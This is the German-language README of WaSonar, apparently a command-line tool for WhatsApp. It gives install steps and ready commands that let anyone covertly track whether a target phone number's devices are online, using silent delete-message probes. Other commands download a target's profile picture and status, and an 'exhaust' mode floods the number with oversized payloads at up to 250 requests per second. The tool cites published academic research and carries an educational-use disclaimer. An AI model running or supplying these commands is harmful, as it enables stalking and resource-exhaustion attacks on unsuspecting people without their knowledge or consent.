
WhatsApp Intelligence & Resource Exhaustion Tool. Bietet Echtzeit-Geräteverfolgung, stille RTT-Sondierung und Protokoll-Stress-Tests für Sicherheitsforschung.
Hinweis: Dieses Tool ist ausschließlich für Bildungszwecke und Sicherheitsforschung bestimmt. Die Entwickler haften nicht für Missbrauch. Bitte nutzen Sie es verantwortungsbewusst und ethisch.
WaSonar ist ein leistungsstarkes CLI-Tool, das für Bildungsforschung, Gerätetracking und Stresstests im WhatsApp-Protokoll entwickelt wurde. Es basiert auf Baileys.
npm install -g wasonar-cli
npx wasonar-cli <command>
git clone https://github.com/AjayAntoIsDev/wasonar.git
cd wasonar
npm install
Zunächst müssen Sie sich mit einem WhatsApp-Konto authentifizieren.
wasonar-cli login
Scannen Sie den QR-Code, der in Ihrem Terminal erscheint.
Alle mit einer Zielnummer verbundenen Geräte auflisten.
wasonar-cli devices <target-number>
# Beispiel:
wasonar-cli devices 919876543210
Die Kernfunktion. Senden Sie stille Sonden, um zu erkennen, ob Geräte online sind und die Latenz zu messen.
# Unbegrenzt viele Sonden senden (Standard)
wasonar-cli online 919876543210
# Bestimmte Anzahl von Sonden senden
wasonar-cli online 919876543210 --probes 5
# Ergebnisse in Datei speichern
wasonar-cli online 919876543210 --output ./logs
Hinweis: PENDING/OFFLINE bedeutet, dass der Server die Nachricht erhalten hat, das Zielgerät jedoch keine Empfangsbestätigung gesendet hat.
Profilbild und Status des Benutzers abrufen.
# Informationen anzeigen und Profilbild herunterladen
wasonar-cli profile 919876543210 --output ./profiles
⚠️ NUR FÜR BILDUNGSZWECKE. Senden von hochfrequenten, überdimensionierten Payloads.
# Aggressiver Modus (Standard: 250 req/s, 1KB Payload)
wasonar-cli exhaust 919876543210
# Langsamer Modus (10 req/s, 500B Payload)
wasonar-cli exhaust 919876543210 --aggression slow
# Dauer festlegen
wasonar-cli exhaust 919876543210 --duration 30
WaSonar verwendet „Stille Lösch-Sonden“, um den Online-Status zu erkennen, ohne das Ziel zu alarmieren.
revoked (Lösch)-Nachricht für eine nicht vorhandene Nachrichten-ID.delivery_receipt (Status 3) für die Protokollnachricht.Basierend auf der „Careless Whisper“-Forschung nutzt dieser Angriff die Validierungslücke in der Reaktionsverarbeitung von WhatsApp aus.
Obwohl Reaktionen auf dem Telefon des Ziels nicht angezeigt werden, wenn sie ungültig sind, werden sie dennoch empfangen und verarbeitet.
Forschungsdaten deuten auf ein erhebliches Potenzial für Ressourcenerschöpfung hin:
Basierend auf Forschung von Gegenhuber et al., Universität Wien & SBA Research:
@inproceedings{gegenhuber2024careless,
title={Careless Whisper: Exploiting Silent Delivery Receipts to Monitor Users on Mobile Instant Messengers},
author={Gegenhuber, Gabriel K. and G{\"u}nther, Maximilian and Maier, Markus and Judmayer, Aljosha and Holzbauer, Florian and Frenzel, Philipp {\'E}. and Ullrich, Johanna},
year={2024},
organization={University of Vienna, SBA Research}
}
Erstellt von AjayAnto